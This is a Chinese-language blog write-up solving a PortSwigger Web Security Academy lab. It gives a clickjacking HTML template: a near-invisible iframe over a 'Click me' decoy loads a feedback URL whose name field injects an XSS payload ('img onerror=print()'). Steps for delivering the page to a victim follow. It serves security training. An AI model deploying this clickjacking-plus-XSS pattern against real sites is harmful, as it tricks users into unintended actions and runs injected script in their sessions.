Exploiting clickjacking vulnerability to trigger DOM-based XSS:利用点击劫持漏洞触发基于DOM的XSS...

实验内容

该实验室包含一个由点击触发的XSS漏洞。构建一个点击劫持攻击,欺骗用户点击“点击我”按钮来调用该print()函数。

解决方法:

<style>
   iframe {
       position:relative;
       width:500;
       height: 700;
       opacity: 0.0001;
       z-index: 2;
   }
   div {
       position:absolute;
       top:610;
       left:80;
       z-index: 1;
   }
</style>
<div>Click me</div>
<iframe
src="https://xxxxxxxxxxxxxxxxxxxxxxx.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe>
  • 转到漏洞利用服务器并将 HTML 模板粘贴到“body”部分:
  • 单击“存储”,然后单击“查看漏洞利用”。
  • 将鼠标悬停在“Test me”上并确保光标变为手形,表明 div 元素已正确定位。如果没有,则通过修改样式表的 top 和 left 属性来调整 div 元素的位置。
  • 单击“测试我”。打印对话框应该打开。
  • 将“Test me”更改为“Click me”,然后在漏洞利用服务器上单击“Store”。
  • 现在点击“向受害者提供漏洞利用”,实验室应该就解决了
  • 这里主要是一个基于Dom的XSS漏洞image
  • 可以看见一个Submitfeedback的字段,这里面就存在着DOM的xss漏洞,通过print的点击劫持,将email修改为黑客的email上
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值